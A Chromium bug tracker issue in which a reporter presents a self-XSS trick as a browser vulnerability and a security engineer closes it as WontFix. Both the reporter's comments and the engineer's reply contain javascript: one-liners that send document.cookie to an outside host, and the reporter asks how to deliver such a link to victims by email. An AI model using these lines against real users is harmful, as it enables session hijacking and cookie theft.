Issue metadata
Sign in to add a comment
|
Security: stealing and downloading batch to the victim (JavaScript runs from the omnibox)
Reported by
mohacker...@gmail.com,
Apr 28 2017
|
||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
this vulnerability allows the hacker to steal cookies or downloading any
batch or adding any thing to the victims browser and the device
VERSION
Chrome Version: [all versions]
Operating System: [all the operating systems]
the vulnerability should be classified under [Sandbox Escape , Renderer Remote Code Execution , Universal XSS (local bypass or equivalent ,Information Leak ,
Download Protection bypass] and more
REPRODUCTION CASE
the vulnerability can be classified under xss or more than that it allows the hacker to do any thing literally any thing in the victims device
and the steps to reproduce the vulnerability its very simple through this cod
javascript:window.location.replace("http://your virus or steal cookies ");
just open new tab in your browser and place the cod then click enter you will be
redirected with out any warning to the cod or to steal cookies of the victim
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [tab, browser, etc.]
if you want any question just ask me
Regards ,
Justin
,
Apr 28 2017
man it does and i've test it and you can paste this javascript cod in your browser and your cookies will be sent to my log.txt file
javascript:window.location.replace("http://www.thebm.ml/invok.php?cookie=" + document.cookie);
it works 100%
,
Apr 28 2017
Comment #3 deleted, as this is a public-visible issue. As noted in #1, this does not represent a vulnerability. See https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability- for discussion.
,
Apr 28 2017
but why it doesn't represent a vulnerability , i mean when the victim goes to that script his cookies will be stealed and being sent to my server
,
Apr 28 2017
It's not a vulnerability because no reasonable user would be willing to run your JavaScript in his browser's address box. An "unreasonable" user might be willing to do so, but that user would also be willing to visit your website and type his password directly into your site, achieving the same effect.
,
Apr 28 2017
ok , is their any thing called xss vulnerability in google chrome ??
,
Apr 28 2017
hi , maybe you didn't get what i meant about " is their any thing called xss vulnerability in google chrome ??" i mean is xss vulnerabilities can be exploited like the normal websites xss vulnerabilities ? please replay , cause am new in this xss browser issue . Regards , Justin
,
Apr 28 2017
Unfortunately, the Chromium Security team can't really scale to individual instruction on web vulnerability classes. Instead, I can suggest you look through https://sites.google.com/site/bughunteruniversity/, https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29, and the book "The Tangled Web".
,
Apr 28 2017
OK , nor problem , but i have one last question about my vulnerability that i mentioned before , would it considered valid if it executed from for example gmail message that being sent to the victim and that link which will sent to the victim contains that cod to steal cookies and as a result that cod will steal the current user session and send it to the attacker , ? would you or google time consider it a valid vulnerability .?? thank you in advance , Regards , Justin
,
May 1 2017
If a web email client (Gmail/Outlook/YahooMail/etc) allowed a JavaScript link to be sent to a user and the clicking the link resulted in script execution, yes, that would be a security vulnerability in the web mail application, and I expect the product owner would rapidly fix it.
,
May 1 2017
ok thank you but what about sending a link through gmail for example and that link once the victim clicks on it his cookies have been stolen and sent to the attacker and that link looks like http://demo.thebm.ml/test.htm or it should be something like this <script>alert('test')</script> that being sent to the victim that would be considered a valid vulnerability ? i mean if it was a link like http://demo.thebm.ml/test.htm that would be considered a valid vulnerability or it should be a script ?? Regards, Justin
,
May 1 2017
I encourage you to read through the resources I mentioned in comment #9. Web mail clients, as a matter of design, remove links and markup that attempts to execute JavaScript within their application's security context.
,
Feb 22 2018
|
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, Apr 28 2017Status: WontFix (was: Unconfirmed)
Summary: Security: stealing and downloading batch to the victim (JavaScript runs from the omnibox) (was: Security: stealing and downloading batch to the victim )
This does not describe an attack against the user. Putting the same HTTP URL in the omnibox without using JavaScript would have the same behavior. Now, if your repro script were something like javascript:window.location.replace("http://badguy.com/?collectdata=" + document.cookie); ...that would indeed take the user's non-HTTPOnly cookies from their current page and send them to the other site. However, this does not represent a vulnerability. See https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability- for discussion.